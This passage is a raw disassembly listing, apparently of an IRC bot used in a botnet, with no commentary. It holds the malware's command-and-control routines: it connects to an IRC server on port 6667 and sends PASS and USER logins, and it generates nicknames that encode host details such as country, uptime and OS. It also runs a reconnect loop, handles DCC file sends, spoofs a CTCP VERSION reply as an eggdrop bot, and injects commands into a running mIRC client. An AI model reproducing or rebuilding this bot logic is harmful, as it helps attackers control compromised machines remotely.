push offset dword_41E998
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40CF71
; ---------------------------------------------------------------------------
loc_40CF60: ; CODE XREF: sub_40CF2F+1E�j
push offset a6667 ; "6667"
push offset dword_41E998
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40CF71: ; CODE XREF: sub_40CF2F+2F�j
cmp [ebp+arg_8], 0
jz short loc_40CF88
push [ebp+arg_8]
push offset byte_41E718
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40CF99
; ---------------------------------------------------------------------------
loc_40CF88: ; CODE XREF: sub_40CF2F+46�j
push offset byte_41DE30
push offset byte_41E718
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40CF99: ; CODE XREF: sub_40CF2F+57�j
jmp loc_40D020
; ---------------------------------------------------------------------------
loc_40CF9E: ; CODE XREF: sub_40CF2F+9�j
and [ebp+var_4], 0
jmp short loc_40CFAB
; ---------------------------------------------------------------------------
loc_40CFA4: ; CODE XREF: sub_40CF2F+8B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40CFAB: ; CODE XREF: sub_40CF2F+73�j
mov eax, [ebp+var_4]
imul eax, 0Ch
cmp off_41DA68[eax], 0
jz short loc_40CFBC
jmp short loc_40CFA4
; ---------------------------------------------------------------------------
loc_40CFBC: ; CODE XREF: sub_40CF2F+89�j
call sub_410422
xor edx, edx
div [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
imul eax, 0Ch
push off_41DA68[eax]
push offset dword_41E898
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_8]
imul eax, 0Ch
push off_41DA6C[eax]
push offset dword_41E998
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_8]
imul eax, 0Ch
cmp dword_41DA70[eax], 0
jz short loc_40D020
mov eax, [ebp+var_8]
imul eax, 0Ch
push dword_41DA70[eax]
push offset byte_41E718
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D020: ; CODE XREF: sub_40CF2F:loc_40CF99�j
; sub_40CF2F+D7�j
push offset dword_41E898
call sub_4105AD
pop ecx
push offset dword_41E998
call sub_4105AD
pop ecx
push offset byte_41E718
call sub_4105AD
pop ecx
leave
retn
sub_40CF2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D043 proc near ; CODE XREF: sub_40D366+7F�p
; sub_40D871+619�p
var_250 = dword ptr -250h
var_24C = byte ptr -24Ch
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_18C = dword ptr -18Ch
var_188 = dword ptr -188h
var_184 = byte ptr -184h
var_104 = byte ptr -104h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 250h
push edi
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_80]
push eax
call sub_40668F
add esp, 0Ch
movsx eax, byte_41E718
test eax, eax
jz short loc_40D099
push offset byte_41E718
call sub_4105FB
pop ecx
push offset byte_41E718
push offset aPassS ; "PASS %s"
call sub_40D6CB
pop ecx
pop ecx
push offset byte_41E718
call sub_4105AD
pop ecx
loc_40D099: ; CODE XREF: sub_40D043+2D�j
cmp [ebp+arg_0], 0
jz loc_40D132
movsx eax, byte_41EEC8
test eax, eax
jz short loc_40D0C3
push offset byte_41EEC8
lea eax, [ebp+var_184]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40D0D6
; ---------------------------------------------------------------------------
loc_40D0C3: ; CODE XREF: sub_40D043+69�j
lea eax, [ebp+var_184]
push eax
push offset byte_41EEC8
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D0D6: ; CODE XREF: sub_40D043+7E�j
movsx eax, byte_41F048
test eax, eax
jz short loc_40D0F6
push offset byte_41F048
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40D109
; ---------------------------------------------------------------------------
loc_40D0F6: ; CODE XREF: sub_40D043+9C�j
lea eax, [ebp+var_104]
push eax
push offset byte_41F048
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D109: ; CODE XREF: sub_40D043+B1�j
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_184]
push eax
push offset aUserSSSS ; "USER %s %s %s :%s"
call sub_40D6CB
add esp, 14h
loc_40D132: ; CODE XREF: sub_40D043+5A�j
cmp [ebp+arg_4], 0
jz loc_40D363
cmp [ebp+arg_0], 0
jz short loc_40D163
movsx eax, byte_41EE48
test eax, eax
jz short loc_40D163
push offset byte_41EE48
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40D363
; ---------------------------------------------------------------------------
loc_40D163: ; CODE XREF: sub_40D043+FD�j
; sub_40D043+108�j
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_188], eax
cmp [ebp+var_188], 4
jnb short loc_40D18D
call sub_406AE7
test eax, eax
jz loc_40D31F
loc_40D18D: ; CODE XREF: sub_40D043+13B�j
call sub_406A23
lea eax, [ebp+var_24C]
push eax
call sub_408342
pop ecx
test eax, eax
jnz short loc_40D1B6
push offset aUnk ; "UNK"
lea eax, [ebp+var_24C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D1B6: ; CODE XREF: sub_40D043+15E�j
call sub_408E8E
cmp eax, 400h
jbe short loc_40D1CF
call sub_408E8E
mov [ebp+var_250], eax
jmp short loc_40D1D9
; ---------------------------------------------------------------------------
loc_40D1CF: ; CODE XREF: sub_40D043+17D�j
mov [ebp+var_250], 400h
loc_40D1D9: ; CODE XREF: sub_40D043+18A�j
mov eax, [ebp+var_250]
shr eax, 0Ah
mov [ebp+var_228], eax
call sub_408887
mov [ebp+var_18C], eax
mov [ebp+var_224], offset aB ; "B"
cmp [ebp+var_18C], 2EEh
jnb short loc_40D213
mov [ebp+var_224], offset aA_0 ; "A"
loc_40D213: ; CODE XREF: sub_40D043+1C4�j
cmp [ebp+var_18C], 1F4h
jnb short loc_40D229
mov [ebp+var_224], offset aG ; "G"
loc_40D229: ; CODE XREF: sub_40D043+1DA�j
and [ebp+var_22C], 0
mov [ebp+var_220], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_21C]
rep stosd
lea eax, [ebp+var_220]
push eax
call ds:dword_417030 ; GetVersionExA
cmp [ebp+var_21C], 5
jnz short loc_40D270
cmp [ebp+var_218], 1
jnz short loc_40D270
mov [ebp+var_22C], 1
loc_40D270: ; CODE XREF: sub_40D043+218�j
; sub_40D043+221�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
cmp [ebp+var_22C], 0
setz al
dec eax
and eax, 2Fh
add eax, 2Dh
movsx eax, al
push eax
push [ebp+var_224]
push [ebp+var_228]
push 5Dh
push [ebp+var_188]
push 5Bh
push 5Dh
lea eax, [ebp+var_24C]
push eax
push 5Bh
push offset aCSCCUCUSCCC ; "%c%s%c%c%u%c%u%s%c%c%c"
lea eax, [ebp+var_80]
push eax
call sub_416B5E ; sprintf
add esp, 34h
movsx eax, byte_41DB34
test eax, eax
jz short loc_40D31D
push offset byte_41DB34
push offset dword_41DAB4
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41DAB4
call sub_4105FB
pop ecx
movsx eax, byte_41DBB4
test eax, eax
jz short loc_40D31D
push offset byte_41DBB4
push offset dword_41ED48
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41ED48
call sub_4105FB
pop ecx
loc_40D31D: ; CODE XREF: sub_40D043+295�j
; sub_40D043+2BC�j
jmp short loc_40D343
; ---------------------------------------------------------------------------
loc_40D31F: ; CODE XREF: sub_40D043+144�j
push offset dword_41DAA4
lea eax, [ebp+var_80]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_80]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_80]
push eax
call sub_40D7E5
pop ecx
loc_40D343: ; CODE XREF: sub_40D043:loc_40D31D�j
lea eax, [ebp+var_80]
push eax
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
lea eax, [ebp+var_80]
push eax
push offset byte_41EE48
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D363: ; CODE XREF: sub_40D043+F3�j
; sub_40D043+11B�j
pop edi
leave
retn
sub_40D043 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D366 proc near ; CODE XREF: sub_40A9CF+1521�p
; sub_40D871+4A7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CF2F
add esp, 0Ch
push dword_41E9A4
call sub_40538D
pop ecx
mov [ebp+var_4], 0EA60h
loc_40D38E: ; CODE XREF: sub_40D366:loc_40D419�j
push offset dword_41E898
call sub_4105FB
pop ecx
push offset dword_41E998
call sub_4105FB
pop ecx
push 2710h
push 1
push offset dword_41E998
push offset dword_41E898
call sub_4050EA
add esp, 10h
mov dword_41E9A4, eax
push offset dword_41E898
call sub_4105AD
pop ecx
push offset dword_41E998
call sub_4105AD
pop ecx
cmp dword_41E9A4, 0
jz short loc_40D3EE
push 1
push 1
call sub_40D043
pop ecx
pop ecx
jmp short locret_40D41E
; ---------------------------------------------------------------------------
loc_40D3EE: ; CODE XREF: sub_40D366+79�j
push 0
push 0
push 0
call sub_40CF2F
add esp, 0Ch
push [ebp+var_4]
call ds:dword_41709C ; Sleep
cmp [ebp+var_4], 0A4CB80h
jge short loc_40D419
mov eax, [ebp+var_4]
add eax, 0EA60h
mov [ebp+var_4], eax
loc_40D419: ; CODE XREF: sub_40D366+A6�j
jmp loc_40D38E
; ---------------------------------------------------------------------------
locret_40D41E: ; CODE XREF: sub_40D366+86�j
leave
retn
sub_40D366 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D420 proc near ; CODE XREF: sub_4020C2+1DE�p
; sub_40A9CF+1219�p ...
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
push [ebp+arg_0]
push offset aNoticeS ; "NOTICE %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_8]
push eax
mov eax, [ebp+var_8]
lea eax, [ebp+eax+var_1008]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1008]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push dword_41E9A4
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D420 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D4AB proc near ; CODE XREF: sub_4020C2+21B�p
; sub_40332B+1A6�p ...
var_1008 = dword ptr -1008h
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
push [ebp+arg_0]
push offset aPrivmsgS ; "PRIVMSG %s :"
lea eax, [ebp+var_1004]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_1008], eax
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_1008]
push eax
mov eax, [ebp+var_1008]
lea eax, [ebp+eax+var_1004]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1004]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1004]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1004]
push eax
push dword_41E9A4
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D4AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D53F proc near ; CODE XREF: sub_401244+51�p
; sub_401244+41E�p ...
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+198h]
test eax, eax
jz short loc_40D55F
jmp locret_40D6C9
; ---------------------------------------------------------------------------
loc_40D55F: ; CODE XREF: sub_40D53F+19�j
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 1
jnz short loc_40D58F
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset aNoticeS ; "NOTICE %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D58F: ; CODE XREF: sub_40D53F+2E�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jnz short loc_40D5BB
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset dword_41A058
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D5BB: ; CODE XREF: sub_40D53F+5A�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D5E7
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset dword_41A048
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D5E7: ; CODE XREF: sub_40D53F+86�j
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset aPrivmsgS ; "PRIVMSG %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
loc_40D605: ; CODE XREF: sub_40D53F+4E�j
; sub_40D53F+7A�j ...
mov eax, [ebp+arg_0]
cmp dword ptr [eax+19Fh], 0
jz short loc_40D63C
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jz short loc_40D629
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D63C
loc_40D629: ; CODE XREF: sub_40D53F+DC�j
push offset dword_41A03C
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
loc_40D63C: ; CODE XREF: sub_40D53F+D0�j
; sub_40D53F+E8�j
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_8]
push eax
mov eax, [ebp+var_8]
lea eax, [ebp+eax+var_1008]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jz short loc_40D680
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D693
loc_40D680: ; CODE XREF: sub_40D53F+133�j
push offset dword_41A038
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
loc_40D693: ; CODE XREF: sub_40D53F+13F�j
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1008]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push dword_41E9A4
call sub_4053BF
add esp, 0Ch
locret_40D6C9: ; CODE XREF: sub_40D53F+1B�j
leave
retn
sub_40D53F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D6CB proc near ; CODE XREF: sub_40332B+205�p
; sub_40332B+212�p ...
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1004h
call sub_416BC0
lea eax, [ebp+arg_4]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_0]
push 1000h
lea eax, [ebp+var_1004]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1004]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1004]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1004]
push eax
push dword_41E9A4
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D6CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D734 proc near ; CODE XREF: sub_40D74D:loc_40D75E�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 0
push offset aMirc ; "mIRC"
call ds:dword_4171E8 ; FindWindowA
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_40D734 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D74D proc near ; CODE XREF: sub_40A9CF+926�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 0
jnz short loc_40D75E
jmp locret_40D7E3
; ---------------------------------------------------------------------------
loc_40D75E: ; CODE XREF: sub_40D74D+A�j
call sub_40D734
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40D76E
jmp short locret_40D7E3
; ---------------------------------------------------------------------------
loc_40D76E: ; CODE XREF: sub_40D74D+1D�j
push offset aMirc ; "mIRC"
push 1000h
push 0
push 4
push 0
push 0FFFFFFFFh
call ds:dword_4170C0 ; CreateFileMappingA
mov [ebp+var_8], eax
push 0
push 0
push 0
push 0F001Fh
push [ebp+var_8]
call ds:dword_4170BC ; MapViewOfFile
mov [ebp+var_C], eax
push [ebp+arg_0]
push [ebp+var_C]
call sub_416B5E ; sprintf
pop ecx
pop ecx
push 0
push 1
push 4C8h
push [ebp+var_4]
call ds:dword_4171EC ; SendMessageA
push 0
push 1
push 4C9h
push [ebp+var_4]
call ds:dword_4171EC ; SendMessageA
push [ebp+var_C]
call ds:dword_4170B8 ; UnmapViewOfFile
push [ebp+var_8]
call ds:dword_4170A4 ; CloseHandle
locret_40D7E3: ; CODE XREF: sub_40D74D+C�j
; sub_40D74D+1F�j
leave
retn
sub_40D74D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D7E5 proc near ; CODE XREF: sub_40A9CF+E3�p
; sub_40D043+2FA�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_40D803
; ---------------------------------------------------------------------------
loc_40D7FC: ; CODE XREF: sub_40D7E5:loc_40D86D�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40D803: ; CODE XREF: sub_40D7E5+15�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jge short locret_40D86F
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40D82E
push 39h
push 30h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_40D86D
; ---------------------------------------------------------------------------
loc_40D82E: ; CODE XREF: sub_40D7E5+32�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40D86D
call sub_410483
test eax, eax
jz short loc_40D85A
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_40D86D
; ---------------------------------------------------------------------------
loc_40D85A: ; CODE XREF: sub_40D7E5+5E�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
loc_40D86D: ; CODE XREF: sub_40D7E5+47�j
; sub_40D7E5+55�j ...
jmp short loc_40D7FC
; ---------------------------------------------------------------------------
locret_40D86F: ; CODE XREF: sub_40D7E5+24�j
leave
retn
sub_40D7E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D871 proc near ; CODE XREF: sub_40E618+321�p
var_7E8 = dword ptr -7E8h
var_7E4 = dword ptr -7E4h
var_7E0 = dword ptr -7E0h
var_7DC = byte ptr -7DCh
var_7D8 = dword ptr -7D8h
var_7D4 = dword ptr -7D4h
var_7D0 = dword ptr -7D0h
var_7CC = dword ptr -7CCh
var_7C8 = dword ptr -7C8h
var_7C4 = byte ptr -7C4h
var_7C0 = dword ptr -7C0h
var_7BC = byte ptr -7BCh
var_5BC = dword ptr -5BCh
var_5B8 = dword ptr -5B8h
var_5B4 = byte ptr -5B4h
var_4B4 = byte ptr -4B4h
var_490 = byte ptr -490h
var_390 = byte ptr -390h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_360 = dword ptr -360h
var_35C = dword ptr -35Ch
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_248 = byte ptr -248h
var_238 = dword ptr -238h
var_234 = byte ptr -234h
var_213 = byte ptr -213h
var_113 = dword ptr -113h
var_10F = byte ptr -10Fh
var_95 = dword ptr -95h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 7E8h
push edi
push offset aPing ; "PING"
mov eax, [ebp+arg_C]
push dword ptr [eax]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8A7
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
push offset aPongS ; "PONG %s"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8A7: ; CODE XREF: sub_40D871+1D�j
push offset aPong ; "PONG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8C2
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8C2: ; CODE XREF: sub_40D871+4A�j
push offset aMode ; "MODE"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8DD
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8DD: ; CODE XREF: sub_40D871+65�j
push offset aPrivmsg ; "PRIVMSG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DB2D
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jz loc_40DB2D
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax+1]
cmp eax, 1
jnz loc_40DB2D
push offset dword_41A14C
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DA81
mov eax, [ebp+arg_C]
cmp dword ptr [eax+10h], 0
jz loc_40DA81
push offset aSend ; "SEND"
mov eax, [ebp+arg_C]
push dword ptr [eax+10h]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DA81
cmp [ebp+arg_0], 0
jz loc_40DA81
mov eax, [ebp+arg_C]
cmp dword ptr [eax+14h], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+18h], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+1Ch], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+20h], 0
jnz short loc_40D98B
loc_40D986: ; CODE XREF: sub_40D871+F8�j
; sub_40D871+101�j ...
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D98B: ; CODE XREF: sub_40D871+113�j
mov eax, [ebp+arg_C]
mov eax, [eax+14h]
movsx eax, byte ptr [eax]
cmp eax, 22h
jnz short loc_40D99E
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D99E: ; CODE XREF: sub_40D871+126�j
mov eax, [ebp+arg_C]
push dword ptr [eax+20h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+20h]
and byte ptr [ecx+eax], 0
push [ebp+arg_4]
lea eax, [ebp+var_234]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41DAB4
lea eax, [ebp+var_213]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
and [ebp+var_113], 0
push 7Ah
push 0
lea eax, [ebp+var_10F]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_95], 1
mov eax, [ebp+arg_C]
push dword ptr [eax+18h]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_238], eax
movzx eax, byte ptr [ebp+var_238]
push eax
mov eax, [ebp+var_238]
shr eax, 8
movzx eax, al
push eax
mov eax, [ebp+var_238]
shr eax, 10h
movzx eax, al
push eax
mov eax, [ebp+var_238]
shr eax, 18h
movzx eax, al
push eax
push offset dword_418A50
lea eax, [ebp+var_248]
push eax
call sub_416B5E ; sprintf
add esp, 18h
mov eax, [ebp+arg_C]
push dword ptr [eax+20h]
mov eax, [ebp+arg_C]
push dword ptr [eax+1Ch]
lea eax, [ebp+var_248]
push eax
mov eax, [ebp+arg_C]
push dword ptr [eax+14h]
push [ebp+arg_4]
lea eax, [ebp+var_234]
push eax
call sub_4024F3
add esp, 18h
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DA81: ; CODE XREF: sub_40D871+BA�j
; sub_40D871+C7�j ...
push offset dword_41A138
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz short loc_40DAAD
push offset dword_41A12C
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DAEB
loc_40DAAD: ; CODE XREF: sub_40D871+224�j
cmp [ebp+arg_0], 0
jz short loc_40DAD1
push offset dword_41DC34
push 3B6h
push 0
push offset dword_41A108
push [ebp+arg_4]
call sub_40D420
add esp, 14h
jmp short loc_40DAE6
; ---------------------------------------------------------------------------
loc_40DAD1: ; CODE XREF: sub_40D871+240�j
push offset aEggdropV1_6_16 ; "eggdrop v1.6.16"
push offset dword_41A0E8
push [ebp+arg_4]
call sub_40D420
add esp, 0Ch
loc_40DAE6: ; CODE XREF: sub_40D871+25E�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DAEB: ; CODE XREF: sub_40D871+23A�j
push offset dword_41A0E0
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz short loc_40DB16
push offset dword_41A0D8
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call ds:dword_417108 ; lstrcmp
test eax, eax
jnz short loc_40DB2D
loc_40DB16: ; CODE XREF: sub_40D871+28E�j
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
push eax
push [ebp+arg_4]
call sub_40D420
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DB2D: ; CODE XREF: sub_40D871+80�j
; sub_40D871+8D�j ...
push offset a433 ; "433"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DCFD
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_2CC], eax
cmp [ebp+var_2CC], 4
jnb short loc_40DB71
call sub_406AE7
test eax, eax
jz loc_40DCB8
loc_40DB71: ; CODE XREF: sub_40D871+2F1�j
call sub_406A23
lea eax, [ebp+var_390]
push eax
call sub_408342
pop ecx
test eax, eax
jnz short loc_40DB9A
push offset aUnk ; "UNK"
lea eax, [ebp+var_390]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
